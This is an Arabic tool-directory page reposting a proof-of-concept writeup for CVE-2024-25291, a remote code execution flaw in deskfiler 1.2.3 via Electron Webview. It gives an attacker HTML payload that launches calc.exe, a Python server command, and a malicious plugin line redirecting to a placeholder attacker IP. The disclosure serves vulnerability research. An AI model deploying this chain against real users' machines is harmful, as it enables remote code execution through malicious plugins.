Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-25291 — deskfiler 1.2.3 استغلال ثغرة إعادة التوجيه المفتوحة | Kitploit
أدوات/GitHubGitHub/eqstlab/cve-2024-25291
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubeqstlab/cve-2024-25291

CVE-2024-25291

deskfiler 1.2.3 استغلال ثغرة إعادة التوجيه المفتوحة

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

DeskFiler RCE

إثبات مفهوم لثغرة CVE-2024-25291.

deskfiler - 1.2.3 يسمح بـ Electron Webview في التطبيق، مع ما ينتج عنه من تنفيذ تعليمات برمجية عن بُعد. في هذا المستودع يوجد تطبيق مثال قابل للاستغلال وإثبات مفهوم (POC) لاستغلاله.

كإثبات مفهوم، يوجد ملف Python يقوم بأتمتة العملية.

1. نظرة عامة على الثغرة:

  • موضوع الثغرة: إعادة توجيه مفتوحة عبر تنفيذ التعليمات البرمجية عن بُعد (RCE)
  • إصدار الثغرة: deskfiler-1.2.3
  • مكان ظهور المشكلة: Electron Webview
  • نوع الهجوم: تنفيذ التعليمات البرمجية عن بُعد
  • متجهات الهجوم: لاستغلال الثغرة، يجب على شخص ما فتح البرنامج الإضافي.
  • رقم CVE المحجوز: CVE-2024-25291

2. سبب الثغرة:

  • شرح الاستغلال
    • في قسم معين داخل التطبيق، يمكن تأكيد قسم يصل إلى رابط خارجي عبر Webview داخل Electron. لذلك، من خلال هذا، يمكن تحقيق تنفيذ تعليمات برمجية عن بُعد (RCE) عبر الاتصال بخادم المهاجم.

إثبات المفهوم (POC)

  • الخطوة 1) قم بتجهيز خادم المهاجم وإنشاء برنامج إضافي خبيث.
root@kitploit:~
<html>
 <head>
 <title>jruru</title>
 </head>
 <body>
 <script>
 const { shell } = require('electron');
 shell.openExternal('file:C:/Windows/System32/calc.exe');
 </script>
 </body>
 </html>

※ إذا كنت تريد اختباره بسرعة، أنشئ خادمًا على جهاز المهاجم باستخدام الكود التالي.

root@kitploit:~
$ python -m http.server 80

ملاحظة: ※ في هذا الوقت، يُفترض أن البرنامج الإضافي هو برنامج إضافي تم إنشاؤه بواسطة المهاجم، وهو مجرد برنامج إضافي عادي تمت إضافة كود إليه للسماح بالوصول إلى خادم المهاجم. تم اختيار BareBone للاختبار البسيط deskfiler1

بعد ذلك، أضف الكود التالي إلى ملف index.js في مسار مجلد BareBone.

root@kitploit:~
window.location='http://[attacker_ip]/hack.html'
  • الخطوة 2) على خادم الضحية، قم بتشغيل Deskfiler وقم بتثبيت البرنامج الإضافي BareBone من خلال "إضافة برنامج إضافي جديد". deskfiler2

deskfiler3


3. معلومات إضافية

في إثبات المفهوم هذا، استخدمنا برنامجًا إضافيًا؛ ومع ذلك، نعتقد أنه مع متجهات هجوم بديلة، يمكن تحقيق تنفيذ تعليمات برمجية عن بُعد (RCE) بشكل مستقل. بالإضافة إلى ذلك، إذا وُجدت ثغرات من جانب الخادم مثل XSS المخزنة (Stored XSS) أو XSS المنعكسة (Reflected XSS)، فإن RCE يُعتبر ممكنًا أيضًا.

تنزيل الأداة